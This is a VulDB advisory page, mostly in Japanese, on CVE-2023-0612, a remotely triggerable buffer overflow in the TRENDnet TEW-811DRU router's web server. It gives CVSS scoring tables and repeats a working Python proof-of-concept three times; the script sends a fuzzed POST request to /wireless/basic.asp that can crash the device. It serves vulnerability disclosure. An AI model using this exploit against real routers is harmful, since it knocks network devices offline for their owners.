TRENDnet TEW-811DRU 1.0.10.0 httpd /wireless/basic.asp メモリ破損

重大 として分類されている脆弱性が TRENDnet TEW-811DRU 1.0.10.0 内に見つかりました。 影響を受けるのは、コンポーネント【httpd】のファイル【/wireless/basic.asp】に含まれる未知の関数です。 未知の値で改ざんすることが、 メモリ破損を突く攻撃に繋がります。 この問題をCWEでは、CWE-120 と定義しました。 この脆弱性は 2023年02月01日ににて 紹介されました。 この脆弱性は CVE-2023-0612 として知られています。 攻撃はリモートで開始される可能性があります。 技術的詳細情報が入手可能です。 さらに、入手できるエクスプロイトツールが存在します。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 エクスプロイトツールの現在の価格はおそらく米ドルで約$0-$5kです。 このエクスプロイトツールは proof-of-concept として宣言されています。 エクスプロイトツールは vuldb.com にダウンロードのために共有されています。 0dayとして、推定される闇市場取引価格はおよそ $0-$5k でした。 】のプラグインを提供しています。

フィールド2023年02月01日 17:522023年03月01日 11:162023年03月01日 11:23
vendorTRENDnetTRENDnetTRENDnet
nameTEW-811DRUTEW-811DRUTEW-811DRU
version1.0.10.01.0.10.01.0.10.0
componenthttpdhttpdhttpd
file/wireless/basic.asp/wireless/basic.asp/wireless/basic.asp
argument
cwe120 (メモリ破損)120 (メモリ破損)120 (メモリ破損)
risk222
cvss3_vuldb_avNNN
cvss3_vuldb_acLLL
cvss3_vuldb_prNNN
cvss3_vuldb_uiNNN
cvss3_vuldb_sUUU
cvss3_vuldb_cNNN
cvss3_vuldb_iNNN
cvss3_vuldb_aHHH
cvss3_vuldb_ePPP
cvss3_vuldb_rcRRR
availability111
publicity111
cveCVE-2023-0612CVE-2023-0612CVE-2023-0612
responsibleVulDBVulDBVulDB
date1675206000 (2023年02月01日)1675206000 (2023年02月01日)1675206000 (2023年02月01日)
cvss2_vuldb_avNNN
cvss2_vuldb_acLLL
cvss2_vuldb_auNNN
cvss2_vuldb_ciNNN
cvss2_vuldb_iiNNN
cvss2_vuldb_aiCCC
cvss2_vuldb_ePOCPOCPOC
cvss2_vuldb_rcURURUR
cvss2_vuldb_rlNDNDND
cvss3_vuldb_rlXXX
cvss2_vuldb_basescore7.87.87.8
cvss2_vuldb_tempscore6.76.76.7
cvss3_vuldb_basescore7.57.57.5
cvss3_vuldb_tempscore6.86.86.8
cvss3_meta_basescore7.57.57.5
cvss3_meta_tempscore6.86.87.3
price_0day$0-$5k$0-$5k$0-$5k
languagePythonPythonPython
sourcecodeimport requests,socket import re import time from urllib.parse import urlencode device_web_ip = '192.168.10.1' request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded', 'Content-Length': '2365', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/basic.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': '1' }, 'PARAM': {'page': '/wireless/basic.asp', b'\xff\x99\xc3\x8a\x02\xff\x7f\\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX', b'wl_inpt': b'1', 'wl_bssid': 2, 'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f', b'wl_\xef\x00\x14\x00\x01': 0, 'wl_ssid': 'dummy', b'l\x80cl\xff\xff\xff': 0, 'wl_chanspec': 40, b'wl_\x90l_\x90': 4, 'wl_wds0': '00:0c:29:d9:40:fe', b'll\x10': '00:0c:29:d9:40:ff', 'wl_wds2': '00:0c:29:d1:40:fe', b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe', b'\x81\x80wwwwwww|wwwwwwwww': 0, b'wl\xff\xff\xff\x04\x00timeout': 1, b'\x00\x10\x7f\x89FF': 0, 'wl_country_code': b'\x00\x80', 'wl_country_rev': 27, 'wl_radio': b'\x1e', 'wl_nband': 1, 'wl_txchain': 3, 'wl_rxchain': b'3', 'wl_nmode_protection': 'auto', 'wl_vlan_prio_mode': b'Rl\x80\x80', 'wl_rate': 0, 'wl_rateset': b'h', 'wl_mrate': 0, 'wl_bcmdcs': 'off', 'wl_antdiv': -1, 'wl_reg_mode': 'off', 'wl_tpc_db': b'00', 'wl_obss_coex': b'1', 'wl_frag': 2346, 'wl_rts': b'3@', 'wl_dtim': b'\x7f', b'\x85\xff\x10\x05\xff': 100, 'wl_bcn_rotate': b'1', 'wl_maxassoc': 128, 'wl_frameburst': b'j\\', 'wl_ampdu': b'V\x82', 'wl_rifs': b'~\x9boo', 'wl_rifs_advert': b'au\x7fo', 'wl_stbc_tx': b'\x03', 'wl_wme': b'nn', 'wl_wme_no_ack': b'\x10\x00\x9a', b'_w\xff\xff': 'on', 'wme_ap': b'(\x9e\x80', 'wl_wme_ap_be': 5, 'wl_wme_ap_be0': b'\x861', 'wl_wme_ap_be1': 63, 'wl_wme_ap_be2': 3, 'wl_wme_ap_be3': 0, 'wl_wme_ap_be4': 0, b'w\x05\xff\xff\x85e_a\x87_beD': 'off', 'wl_wme_ap_be6': b'\x9a', 'wl_wme_ap_bk': 5, 'wl_wme_ap_bk0': b'\xc3\xbc', b'wl_wm{_apZbk1': 1023, 'wl_wme_ap_bk2': 7, 'wl_wme_ap_bk3': b'008', 'wl_wme_ap_bk4': 0, 'wl_wme_ap_bk5': b'ofo', 'wl_wme_ap_bk6': b'\x80\x80\x00\xdb', 'wl_wme_ap_vi': 5, 'wl_wme_ap_vi0': 7, 'wl_wme_ap_vi1': b'1G\xc3G', b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1, 'wl_wme_ap_vi3': 6016, 'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad', 'wl_wme_ap_vi5': b'\xff\xff\x17', 'wl_wme_ap_vi6': 'off', b'wl[wmeIap_vo': 5, 'wl_wme_ap_vo0': 3, 'wl_wme_ap_vo1': b'\xc3\xae\xf5', 'wl_wme_ap_vo2': 1, 'wl_wme_ap_vo3': b'\xff\x05\xff\xff', 'wl_wme_ap_vo4': b'P', b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf', 'wl_wme_ap_vo6': b'oLd', b'ws]\xc2\x90\xc2\x90Ke': b'x', 'wl_wme_sta_be': 5, 'wl_wme_sta_be0': 15, b'\xf1\x00\xff\x0f': 1023, 'wl_wme_sta_be2': 3, b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_', b't\x81\x803t\x81a3': 0, 'wl_wme_sta_be5': b'oof', 'wl_wme_sta_be6': b'boff', 'wl_wme_sta_bk': 5, 'wl_wme_sta_bk0': 15, 'wl_wme_sta_bk1': 1023, 'wl_wme_sta_bk2': 7, b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f', 'wl_wme_sta_bk4': 0, 'wl_wme_sta_bk5': b'd', 'wl_wme_sta_bk6': 'off', 'wl_wme_sta_vi': 5, b'wlTwulTwuekQ\x84': 7, 'wl_wme_sta_vi1': 15, 'wl_wme_sta_vi2': 2, 'wl_wme_sta_vi3': 6016, 'wl_wme_sta_vi4': 3008, 'wl_wme_sta_vi5': 'off', 'wl_wme_sta_vi6': 'off', 'wl_wme_sta_vo': 5, b'wP_wme_s\x00\x01\xff\xe7\x070': 3, 'wl_wme_sta_vo1': 7, b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2, 'wl_wme_sta_vo3': b'\x80\x00\x80\x0164', b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00', 'wl_wme_sta_vo5': b'Qff', 'wl_wme_sta_vo6': 'off', 'wme_txp': 8, 'wl_wme_txp_be0': 7, b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90', 'wl_wme_txp_be2': 4, 'wl_wme_txp_be3': 2, 'wl_wme_txp_be4': 0, 'wl_wme_txp_bk': 5, 'wl_wme_txp_bk0': b'O', b'_wmwme_txp_\x85k1': 3, 'wl_wme_txp_bk2': 4, 'wl_wme_txp_bk3': 2, 'wl_wme_txp_bk4': 0, 'wl_wme_txp_vi': 5, 'wl_wme_txp_vi0': 7, 'wl_wme_txp_vi1': 3, 'wl_wme_txp_vi2': 4, 'wl_wme_txp_vi3': 2, 'wl_wme_txp_vi4': 0, 'wl_wme_txp_vo': 5, b'wl_w\x0b\x0b\n\x0bxp_vo0': 7, b't\x01': b'M', b'l_wme_me_txp_txp__tx': 4, 'wl_wme_txp_vo3': b':', 'wl_wme_txp_vo4': 0, 'wl_mode': 'ap', 'wl_ure': 0, 'wl_bridge': 0, 'wl_vlan_prio_mode__117_66oo': b'ome', b'/wipeless/basic.asp': b'', b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff', 'wan_summary_2_pppoe_username': '', 'mainform_submit': '', b'/tapppp.cgi': '', 'openheader': b'' }, 'ATTR': {'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) except Exception as e: print('error:{}'.format(e))import requests,socket import re import time from urllib.parse import urlencode device_web_ip = '192.168.10.1' request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded', 'Content-Length': '2365', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/basic.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': '1' }, 'PARAM': {'page': '/wireless/basic.asp', b'\xff\x99\xc3\x8a\x02\xff\x7f\\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX', b'wl_inpt': b'1', 'wl_bssid': 2, 'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f', b'wl_\xef\x00\x14\x00\x01': 0, 'wl_ssid': 'dummy', b'l\x80cl\xff\xff\xff': 0, 'wl_chanspec': 40, b'wl_\x90l_\x90': 4, 'wl_wds0': '00:0c:29:d9:40:fe', b'll\x10': '00:0c:29:d9:40:ff', 'wl_wds2': '00:0c:29:d1:40:fe', b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe', b'\x81\x80wwwwwww|wwwwwwwww': 0, b'wl\xff\xff\xff\x04\x00timeout': 1, b'\x00\x10\x7f\x89FF': 0, 'wl_country_code': b'\x00\x80', 'wl_country_rev': 27, 'wl_radio': b'\x1e', 'wl_nband': 1, 'wl_txchain': 3, 'wl_rxchain': b'3', 'wl_nmode_protection': 'auto', 'wl_vlan_prio_mode': b'Rl\x80\x80', 'wl_rate': 0, 'wl_rateset': b'h', 'wl_mrate': 0, 'wl_bcmdcs': 'off', 'wl_antdiv': -1, 'wl_reg_mode': 'off', 'wl_tpc_db': b'00', 'wl_obss_coex': b'1', 'wl_frag': 2346, 'wl_rts': b'3@', 'wl_dtim': b'\x7f', b'\x85\xff\x10\x05\xff': 100, 'wl_bcn_rotate': b'1', 'wl_maxassoc': 128, 'wl_frameburst': b'j\\', 'wl_ampdu': b'V\x82', 'wl_rifs': b'~\x9boo', 'wl_rifs_advert': b'au\x7fo', 'wl_stbc_tx': b'\x03', 'wl_wme': b'nn', 'wl_wme_no_ack': b'\x10\x00\x9a', b'_w\xff\xff': 'on', 'wme_ap': b'(\x9e\x80', 'wl_wme_ap_be': 5, 'wl_wme_ap_be0': b'\x861', 'wl_wme_ap_be1': 63, 'wl_wme_ap_be2': 3, 'wl_wme_ap_be3': 0, 'wl_wme_ap_be4': 0, b'w\x05\xff\xff\x85e_a\x87_beD': 'off', 'wl_wme_ap_be6': b'\x9a', 'wl_wme_ap_bk': 5, 'wl_wme_ap_bk0': b'\xc3\xbc', b'wl_wm{_apZbk1': 1023, 'wl_wme_ap_bk2': 7, 'wl_wme_ap_bk3': b'008', 'wl_wme_ap_bk4': 0, 'wl_wme_ap_bk5': b'ofo', 'wl_wme_ap_bk6': b'\x80\x80\x00\xdb', 'wl_wme_ap_vi': 5, 'wl_wme_ap_vi0': 7, 'wl_wme_ap_vi1': b'1G\xc3G', b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1, 'wl_wme_ap_vi3': 6016, 'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad', 'wl_wme_ap_vi5': b'\xff\xff\x17', 'wl_wme_ap_vi6': 'off', b'wl[wmeIap_vo': 5, 'wl_wme_ap_vo0': 3, 'wl_wme_ap_vo1': b'\xc3\xae\xf5', 'wl_wme_ap_vo2': 1, 'wl_wme_ap_vo3': b'\xff\x05\xff\xff', 'wl_wme_ap_vo4': b'P', b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf', 'wl_wme_ap_vo6': b'oLd', b'ws]\xc2\x90\xc2\x90Ke': b'x', 'wl_wme_sta_be': 5, 'wl_wme_sta_be0': 15, b'\xf1\x00\xff\x0f': 1023, 'wl_wme_sta_be2': 3, b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_', b't\x81\x803t\x81a3': 0, 'wl_wme_sta_be5': b'oof', 'wl_wme_sta_be6': b'boff', 'wl_wme_sta_bk': 5, 'wl_wme_sta_bk0': 15, 'wl_wme_sta_bk1': 1023, 'wl_wme_sta_bk2': 7, b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f', 'wl_wme_sta_bk4': 0, 'wl_wme_sta_bk5': b'd', 'wl_wme_sta_bk6': 'off', 'wl_wme_sta_vi': 5, b'wlTwulTwuekQ\x84': 7, 'wl_wme_sta_vi1': 15, 'wl_wme_sta_vi2': 2, 'wl_wme_sta_vi3': 6016, 'wl_wme_sta_vi4': 3008, 'wl_wme_sta_vi5': 'off', 'wl_wme_sta_vi6': 'off', 'wl_wme_sta_vo': 5, b'wP_wme_s\x00\x01\xff\xe7\x070': 3, 'wl_wme_sta_vo1': 7, b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2, 'wl_wme_sta_vo3': b'\x80\x00\x80\x0164', b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00', 'wl_wme_sta_vo5': b'Qff', 'wl_wme_sta_vo6': 'off', 'wme_txp': 8, 'wl_wme_txp_be0': 7, b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90', 'wl_wme_txp_be2': 4, 'wl_wme_txp_be3': 2, 'wl_wme_txp_be4': 0, 'wl_wme_txp_bk': 5, 'wl_wme_txp_bk0': b'O', b'_wmwme_txp_\x85k1': 3, 'wl_wme_txp_bk2': 4, 'wl_wme_txp_bk3': 2, 'wl_wme_txp_bk4': 0, 'wl_wme_txp_vi': 5, 'wl_wme_txp_vi0': 7, 'wl_wme_txp_vi1': 3, 'wl_wme_txp_vi2': 4, 'wl_wme_txp_vi3': 2, 'wl_wme_txp_vi4': 0, 'wl_wme_txp_vo': 5, b'wl_w\x0b\x0b\n\x0bxp_vo0': 7, b't\x01': b'M', b'l_wme_me_txp_txp__tx': 4, 'wl_wme_txp_vo3': b':', 'wl_wme_txp_vo4': 0, 'wl_mode': 'ap', 'wl_ure': 0, 'wl_bridge': 0, 'wl_vlan_prio_mode__117_66oo': b'ome', b'/wipeless/basic.asp': b'', b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff', 'wan_summary_2_pppoe_username': '', 'mainform_submit': '', b'/tapppp.cgi': '', 'openheader': b'' }, 'ATTR': {'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) except Exception as e: print('error:{}'.format(e))import requests,socket import re import time from urllib.parse import urlencode device_web_ip = '192.168.10.1' request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded', 'Content-Length': '2365', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/basic.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': '1' }, 'PARAM': {'page': '/wireless/basic.asp', b'\xff\x99\xc3\x8a\x02\xff\x7f\\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX', b'wl_inpt': b'1', 'wl_bssid': 2, 'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f', b'wl_\xef\x00\x14\x00\x01': 0, 'wl_ssid': 'dummy', b'l\x80cl\xff\xff\xff': 0, 'wl_chanspec': 40, b'wl_\x90l_\x90': 4, 'wl_wds0': '00:0c:29:d9:40:fe', b'll\x10': '00:0c:29:d9:40:ff', 'wl_wds2': '00:0c:29:d1:40:fe', b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe', b'\x81\x80wwwwwww|wwwwwwwww': 0, b'wl\xff\xff\xff\x04\x00timeout': 1, b'\x00\x10\x7f\x89FF': 0, 'wl_country_code': b'\x00\x80', 'wl_country_rev': 27, 'wl_radio': b'\x1e', 'wl_nband': 1, 'wl_txchain': 3, 'wl_rxchain': b'3', 'wl_nmode_protection': 'auto', 'wl_vlan_prio_mode': b'Rl\x80\x80', 'wl_rate': 0, 'wl_rateset': b'h', 'wl_mrate': 0, 'wl_bcmdcs': 'off', 'wl_antdiv': -1, 'wl_reg_mode': 'off', 'wl_tpc_db': b'00', 'wl_obss_coex': b'1', 'wl_frag': 2346, 'wl_rts': b'3@', 'wl_dtim': b'\x7f', b'\x85\xff\x10\x05\xff': 100, 'wl_bcn_rotate': b'1', 'wl_maxassoc': 128, 'wl_frameburst': b'j\\', 'wl_ampdu': b'V\x82', 'wl_rifs': b'~\x9boo', 'wl_rifs_advert': b'au\x7fo', 'wl_stbc_tx': b'\x03', 'wl_wme': b'nn', 'wl_wme_no_ack': b'\x10\x00\x9a', b'_w\xff\xff': 'on', 'wme_ap': b'(\x9e\x80', 'wl_wme_ap_be': 5, 'wl_wme_ap_be0': b'\x861', 'wl_wme_ap_be1': 63, 'wl_wme_ap_be2': 3, 'wl_wme_ap_be3': 0, 'wl_wme_ap_be4': 0, b'w\x05\xff\xff\x85e_a\x87_beD': 'off', 'wl_wme_ap_be6': b'\x9a', 'wl_wme_ap_bk': 5, 'wl_wme_ap_bk0': b'\xc3\xbc', b'wl_wm{_apZbk1': 1023, 'wl_wme_ap_bk2': 7, 'wl_wme_ap_bk3': b'008', 'wl_wme_ap_bk4': 0, 'wl_wme_ap_bk5': b'ofo', 'wl_wme_ap_bk6': b'\x80\x80\x00\xdb', 'wl_wme_ap_vi': 5, 'wl_wme_ap_vi0': 7, 'wl_wme_ap_vi1': b'1G\xc3G', b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1, 'wl_wme_ap_vi3': 6016, 'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad', 'wl_wme_ap_vi5': b'\xff\xff\x17', 'wl_wme_ap_vi6': 'off', b'wl[wmeIap_vo': 5, 'wl_wme_ap_vo0': 3, 'wl_wme_ap_vo1': b'\xc3\xae\xf5', 'wl_wme_ap_vo2': 1, 'wl_wme_ap_vo3': b'\xff\x05\xff\xff', 'wl_wme_ap_vo4': b'P', b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf', 'wl_wme_ap_vo6': b'oLd', b'ws]\xc2\x90\xc2\x90Ke': b'x', 'wl_wme_sta_be': 5, 'wl_wme_sta_be0': 15, b'\xf1\x00\xff\x0f': 1023, 'wl_wme_sta_be2': 3, b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_', b't\x81\x803t\x81a3': 0, 'wl_wme_sta_be5': b'oof', 'wl_wme_sta_be6': b'boff', 'wl_wme_sta_bk': 5, 'wl_wme_sta_bk0': 15, 'wl_wme_sta_bk1': 1023, 'wl_wme_sta_bk2': 7, b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f', 'wl_wme_sta_bk4': 0, 'wl_wme_sta_bk5': b'd', 'wl_wme_sta_bk6': 'off', 'wl_wme_sta_vi': 5, b'wlTwulTwuekQ\x84': 7, 'wl_wme_sta_vi1': 15, 'wl_wme_sta_vi2': 2, 'wl_wme_sta_vi3': 6016, 'wl_wme_sta_vi4': 3008, 'wl_wme_sta_vi5': 'off', 'wl_wme_sta_vi6': 'off', 'wl_wme_sta_vo': 5, b'wP_wme_s\x00\x01\xff\xe7\x070': 3, 'wl_wme_sta_vo1': 7, b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2, 'wl_wme_sta_vo3': b'\x80\x00\x80\x0164', b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00', 'wl_wme_sta_vo5': b'Qff', 'wl_wme_sta_vo6': 'off', 'wme_txp': 8, 'wl_wme_txp_be0': 7, b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90', 'wl_wme_txp_be2': 4, 'wl_wme_txp_be3': 2, 'wl_wme_txp_be4': 0, 'wl_wme_txp_bk': 5, 'wl_wme_txp_bk0': b'O', b'_wmwme_txp_\x85k1': 3, 'wl_wme_txp_bk2': 4, 'wl_wme_txp_bk3': 2, 'wl_wme_txp_bk4': 0, 'wl_wme_txp_vi': 5, 'wl_wme_txp_vi0': 7, 'wl_wme_txp_vi1': 3, 'wl_wme_txp_vi2': 4, 'wl_wme_txp_vi3': 2, 'wl_wme_txp_vi4': 0, 'wl_wme_txp_vo': 5, b'wl_w\x0b\x0b\n\x0bxp_vo0': 7, b't\x01': b'M', b'l_wme_me_txp_txp__tx': 4, 'wl_wme_txp_vo3': b':', 'wl_wme_txp_vo4': 0, 'wl_mode': 'ap', 'wl_ure': 0, 'wl_bridge': 0, 'wl_vlan_prio_mode__117_66oo': b'ome', b'/wipeless/basic.asp': b'', b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff', 'wan_summary_2_pppoe_username': '', 'mainform_submit': '', b'/tapppp.cgi': '', 'openheader': b'' }, 'ATTR': {'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) except Exception as e: print('error:{}'.format(e))
cve_assigned1675206000 (2023年02月01日)1675206000 (2023年02月01日)
cve_nvd_summaryA vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219936.A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219936.
cvss3_nvd_avN
cvss3_nvd_acL
cvss3_nvd_prN
cvss3_nvd_uiN
cvss3_nvd_sU
cvss3_nvd_cN
cvss3_nvd_iN
cvss3_nvd_aH
cvss2_nvd_avN
cvss2_nvd_acL
cvss2_nvd_auN
cvss2_nvd_ciN
cvss2_nvd_iiN
cvss2_nvd_aiC
cvss3_cna_avN
cvss3_cna_acL
cvss3_cna_prN
cvss3_cna_uiN
cvss3_cna_sU
cvss3_cna_cN
cvss3_cna_iN
cvss3_cna_aH
cve_cnaVulDB
cvss2_nvd_basescore7.8
cvss3_nvd_basescore7.5
cvss3_cna_basescore7.5

概要

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!